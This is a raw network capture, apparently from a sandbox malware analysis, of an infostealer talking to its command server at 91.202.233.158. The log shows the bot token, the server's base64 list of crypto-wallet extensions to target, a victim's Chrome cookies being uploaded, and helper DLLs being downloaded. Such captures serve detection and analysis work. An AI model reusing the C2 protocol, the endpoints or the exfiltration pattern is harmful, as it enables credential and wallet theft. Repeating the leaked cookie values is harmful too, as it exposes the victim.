Sep 3, 2024 17:13:37.906246901 CEST	468	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK Host: 91.202.233.158 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 2d 2d 0d 0a Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="message"plugins------GDBKKFHIEGDHJKECAAKK--
Sep 3, 2024 17:13:38.144174099 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:38 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 3, 2024 17:13:38.144440889 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 3, 2024 17:13:38.144459963 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 3, 2024 17:13:38.147279978 CEST	672	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 3, 2024 17:13:38.147291899 CEST	1236	IN	Data Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32 Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
Sep 3, 2024 17:13:38.147304058 CEST	224	IN	Data Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44 Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZw
Sep 3, 2024 17:13:38.147315025 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Sep 3, 2024 17:13:38.147325993 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Sep 3, 2024 17:13:38.149521112 CEST	469	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ Host: 91.202.233.158 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="message"fplugins------HDAFIIDAKJDGDHIDAKJJ--
Sep 3, 2024 17:13:38.381592035 CEST	335	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:38 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 3, 2024 17:13:38.444984913 CEST	202	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFB Host: 91.202.233.158 Content-Length: 6667 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:38.445027113 CEST	6667	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 Data Ascii: ------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 3, 2024 17:13:39.039705992 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:39.040555000 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:40.045528889 CEST	93	OUT	GET /3836fd5700214436/sqlite3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:40.273780107 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:40 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 3, 2024 17:13:40.273802042 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 3, 2024 17:13:41.662615061 CEST	952	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH Host: 91.202.233.158 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZkxpLXRRbnZpaG81aEtKWEtETmcwa1hJUG5mVGN1d1Y1cjdScWpUODkzcFdHSkY3a2xLcWxkQm9qNHJESnZ4ZkZsZ0RPQ2NXOWFLRG5VOXpJbFVoMkxQMHZPOGszdVQwZ0hKRDFKdlZBY2xrSm5Ld1pHNmhEQWw2MkhyTXhOclVlcVNSLVdGMUotbDlZWWdFCg==------AFHIEBKKFHIEGCAKECGH--
Sep 3, 2024 17:13:41.907226086 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:42.049683094 CEST	564	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBG Host: 91.202.233.158 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file"------FHCGHJDBFIIDGDHIJDBG--
Sep 3, 2024 17:13:42.338324070 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:43.359564066 CEST	564	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG Host: 91.202.233.158 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file"------ECGDBAEHIJKKFHIEGCBG--
Sep 3, 2024 17:13:43.732301950 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:44.266391039 CEST	93	OUT	GET /3836fd5700214436/freebl3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:44.497955084 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS 